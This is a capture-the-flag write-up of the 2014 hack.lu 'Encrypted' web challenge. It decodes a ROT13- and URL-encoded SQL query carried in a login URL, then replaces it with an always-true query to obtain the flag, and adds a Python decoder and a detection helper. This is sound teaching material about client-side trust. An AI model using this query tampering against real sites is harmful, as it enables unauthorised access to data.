Oct 23, 2014 • Abstract

Encrypted

https://wildwildweb.fluxfingers.net:1411

Solution

This was one of the easiest challenges in the 2014 hack.lu CTF, and it involved a simple web login interface. Checking the page’s source code revealed nothing interesting, so I entered a test username and password and was taken to a page telling me that the login had failed. Again, there was nothing interesting in the page’s source code. However, the URL of the login-failed page was:

https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG+%60anzr%60+SEBZ+%60hfref%60+JURER+%60anzr%60+%3D+%27nnnn%27+NAQ+%60cnffjbeq%60+%3D+ZQ5%28%27oooo%27%29

i.e. a massive flashing red light in a hacking challenge. Removing the URL encoding (using http://meyerweb.com/eric/tools/dencoder/) this became:

https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref` JURER `anzr` = 'nnnn' NAQ `cnffjbeq` = ZQ5('oooo')

As an additional test I entered abcdef as the username and 12345 as the password and got:

https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref` JURER `anzr` = 'nopqrs' NAQ `cnffjbeq` = ZQ5('12345')

abcdef seems to have become nopqrs and 12345 stayed 12345 (letters shifted by 13 places, digits untouched), so this is ROT13 encoding. ROT13-decoding (http://www.rot13.com) the whole URL, we get:

https://wildwildweb.fluxfingers.net:1411/dologin.php?query=SELECT `name` FROM `users` WHERE `name` = 'abcdef' AND `password` = MD5('12345')

I.e., the SQL is being passed to the login page as a query parameter, so the client controls the statement the server runs. We change this to a query that will always succeed:

https://wildwildweb.fluxfingers.net:1411/dologin.php?query=SELECT `name` FROM `users`

ROT13 encode it:

https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref`

URL encode it:

https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG+%60anzr%60+SEBZ+%60hfref%60

And going to this URL we get the flag:

Encrypted Login

Hello admin! The flag is flag{nobody_needs_server_side_validation}.
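The decode and re-encode steps above, as an added Python example (not part of the original write-up). It uses the page's first failed-login URL as its sample input and only the standard library; `decode_dhrel`, `encode_query` and `is_client_supplied_sql` are names chosen here.

```python
import codecs
from urllib.parse import urlsplit, parse_qs, quote_plus

# Sample input: the failed-login URL from the write-up (username aaaa, password bbbb).
SAMPLE_URL = (
    "https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel="
    "FRYRPG+%60anzr%60+SEBZ+%60hfref%60+JURER+%60anzr%60+%3D+%27nnnn%27"
    "+NAQ+%60cnffjbeq%60+%3D+ZQ5%28%27oooo%27%29"
)

# SQL statement keywords; if a decoded parameter starts with one of these,
# the client is supplying the query text itself.
SQL_VERBS = {"SELECT", "INSERT", "UPDATE", "DELETE", "UNION"}


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one helper serves both directions."""
    return codecs.encode(text, "rot_13")


def decode_dhrel(url: str) -> dict:
    """Recover the plain SQL hidden in the ?dhrel= parameter.

    parse_qs undoes the URL encoding ('+' -> space, %60 -> backtick);
    ROT13 then turns 'dhrel' into 'query' and the value into SQL.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    obfuscated = params["dhrel"][0]
    return {"param": rot13("dhrel"), "sql": rot13(obfuscated)}


def encode_query(sql: str) -> str:
    """Reverse the steps: ROT13 the SQL, then URL-encode it (spaces become '+')."""
    return "dhrel=" + quote_plus(rot13(sql))


def is_client_supplied_sql(url: str) -> bool:
    """Detection check for a log reviewer: does the request carry a SQL statement?"""
    first_token = decode_dhrel(url)["sql"].strip().split(" ", 1)[0].upper()
    return first_token in SQL_VERBS


if __name__ == "__main__":
    decoded = decode_dhrel(SAMPLE_URL)
    print(decoded["param"], "=", decoded["sql"])
    print("client-supplied SQL:", is_client_supplied_sql(SAMPLE_URL))
```

Round-tripping the decoded SQL through `encode_query` reproduces the `dhrel=` parameter exactly as it appears in the original URL.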